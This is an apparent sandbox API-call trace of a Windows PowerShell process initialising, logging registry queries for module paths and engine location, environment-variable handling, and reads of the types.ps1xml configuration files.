	[0344.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.066] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0344.066] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0344.067] CoTaskMemFree (pv=0x1b8da0) 
	[0344.068] CoTaskMemAlloc (cb=0xcc) returned 0x1b8a5910
	[0344.068] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8a5910, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0344.068] CoTaskMemFree (pv=0x1b8a5910) 
	[0344.068] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xad868 | out: phkResult=0xad868*=0x320) returned 0x0
	[0344.069] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad7ec, lpData=0x0, lpcbData=0xad7e8*=0x0 | out: lpType=0xad7ec*=0x2, lpData=0x0, lpcbData=0xad7e8*=0x6c) returned 0x0
	[0344.069] CoTaskMemAlloc (cb=0x70) returned 0x2011a0
	[0344.069] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad7bc, lpData=0x2011a0, lpcbData=0xad7b8*=0x6c | out: lpType=0xad7bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xad7b8*=0x6c) returned 0x0
	[0344.069] CoTaskMemFree (pv=0x2011a0) 
	[0344.069] CoTaskMemAlloc (cb=0xcc) returned 0x1b8a5910
	[0344.069] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8a5910, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0344.069] CoTaskMemFree (pv=0x1b8a5910) 
	[0344.069] CoTaskMemAlloc (cb=0xcc) returned 0x1b8a5910
	[0344.069] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8a5910, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0344.069] CoTaskMemFree (pv=0x1b8a5910) 
	[0344.073] RegCloseKey (hKey=0x320) returned 0x0
	[0344.073] CoTaskMemAlloc (cb=0xcc) returned 0x1b8a5910
	[0344.073] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8a5910, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0344.073] CoTaskMemFree (pv=0x1b8a5910) 
	[0344.073] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xad868 | out: phkResult=0xad868*=0x320) returned 0x0
	[0344.073] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xad7ec, lpData=0x0, lpcbData=0xad7e8*=0x0 | out: lpType=0xad7ec*=0x0, lpData=0x0, lpcbData=0xad7e8*=0x0) returned 0x2
	[0344.073] RegCloseKey (hKey=0x320) returned 0x0
	[0344.361] CoTaskMemAlloc (cb=0x20c) returned 0x253a90
	[0344.362] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x253a90 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0344.363] CoTaskMemFree (pv=0x253a90) 
	[0344.363] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xad3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0344.364] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0344.375] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0344.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.375] CoTaskMemFree (pv=0x1b8da0) 
	[0344.375] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0344.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.375] CoTaskMemFree (pv=0x1b8da0) 
	[0344.377] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0344.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.377] CoTaskMemFree (pv=0x1b8da0) 
	[0344.378] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0344.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.378] CoTaskMemFree (pv=0x1b8da0) 
	[0344.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad658 | out: phkResult=0xad658*=0x328) returned 0x0
	[0344.381] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xad66c, lpData=0x0, lpcbData=0xad668*=0x0 | out: lpType=0xad66c*=0x1, lpData=0x0, lpcbData=0xad668*=0x74) returned 0x0
	[0344.381] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xad5dc, lpData=0x0, lpcbData=0xad5d8*=0x0 | out: lpType=0xad5dc*=0x1, lpData=0x0, lpcbData=0xad5d8*=0x74) returned 0x0
	[0344.381] CoTaskMemAlloc (cb=0x78) returned 0x2011a0
	[0344.381] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xad5ac, lpData=0x2011a0, lpcbData=0xad5a8*=0x74 | out: lpType=0xad5ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xad5a8*=0x74) returned 0x0
	[0344.381] CoTaskMemFree (pv=0x2011a0) 
	[0344.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0344.381] SetErrorMode (uMode=0x1) returned 0x1
	[0344.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xad530 | out: lpFileInformation=0xad530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0344.381] SetErrorMode (uMode=0x1) returned 0x1
	[0344.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0344.382] SetErrorMode (uMode=0x1) returned 0x1
	[0344.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad530 | out: lpFileInformation=0xad530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0344.382] SetErrorMode (uMode=0x1) returned 0x1
	[0344.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0344.384] SetErrorMode (uMode=0x1) returned 0x1
	[0344.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad530 | out: lpFileInformation=0xad530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0344.384] SetErrorMode (uMode=0x1) returned 0x1
	[0344.384] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0344.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.384] CoTaskMemFree (pv=0x1b8da0) 
	[0344.385] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0344.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.385] CoTaskMemFree (pv=0x1b8da0) 
	[0344.386] GetACP () returned 0x4e4
	[0344.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0344.394] SetErrorMode (uMode=0x1) returned 0x1
	[0344.395] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0344.396] GetFileType (hFile=0x32c) returned 0x1
	[0344.396] SetErrorMode (uMode=0x1) returned 0x1
	[0344.396] GetFileType (hFile=0x32c) returned 0x1
	[0344.398] ReadFile (in: hFile=0x32c, lpBuffer=0x2e8bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2e8bf80*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0344.400] ReadFile (in: hFile=0x32c, lpBuffer=0x2e8bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2e8bf80*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0344.400] ReadFile (in: hFile=0x32c, lpBuffer=0x2e8bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2e8bf80*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0344.401] ReadFile (in: hFile=0x32c, lpBuffer=0x2e8bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2e8bf80*, lpNumberOfBytesRead=0xad468*=0xcf3, lpOverlapped=0x0) returned 1
	[0344.401] ReadFile (in: hFile=0x32c, lpBuffer=0x2e8b3db, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2e8b3db*, lpNumberOfBytesRead=0xad468*=0x0, lpOverlapped=0x0) returned 1
	[0344.401] ReadFile (in: hFile=0x32c, lpBuffer=0x2e8bf80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2e8bf80*, lpNumberOfBytesRead=0xad468*=0x0, lpOverlapped=0x0) returned 1
	[0344.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0344.404] SetErrorMode (uMode=0x1) returned 0x1
	[0344.404] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad3e0 | out: lpFileInformation=0xad3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0344.404] SetErrorMode (uMode=0x1) returned 0x1
	[0344.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0344.656] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4c8 | out: phkResult=0xad4c8*=0x32c) returned 0x0
	[0344.656] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad44c, lpData=0x0, lpcbData=0xad448*=0x0 | out: lpType=0xad44c*=0x1, lpData=0x0, lpcbData=0xad448*=0x56) returned 0x0
	[0344.656] CoTaskMemAlloc (cb=0x5a) returned 0x27d310
	[0344.656] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad41c, lpData=0x27d310, lpcbData=0xad418*=0x56 | out: lpType=0xad41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad418*=0x56) returned 0x0
	[0344.656] CoTaskMemFree (pv=0x27d310) 
	[0344.656] RegCloseKey (hKey=0x32c) returned 0x0
	[0344.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0344.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xacfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0344.683] GetSystemInfo (in: lpSystemInfo=0xac100 | out: lpSystemInfo=0xac100*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0344.683] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xacee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0345.003] SetErrorMode (uMode=0x1) returned 0x1
	[0345.003] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0345.003] GetFileType (hFile=0x328) returned 0x1
	[0345.003] SetErrorMode (uMode=0x1) returned 0x1
	[0345.003] GetFileType (hFile=0x328) returned 0x1
	[0345.003] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.004] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.004] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.004] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.005] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.005] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.005] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.005] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.006] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.006] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.007] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.007] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.007] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.007] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.008] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.008] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.008] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.010] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.010] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.010] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.010] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.011] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.011] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.011] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.011] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.012] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.012] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.012] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.020] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.021] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
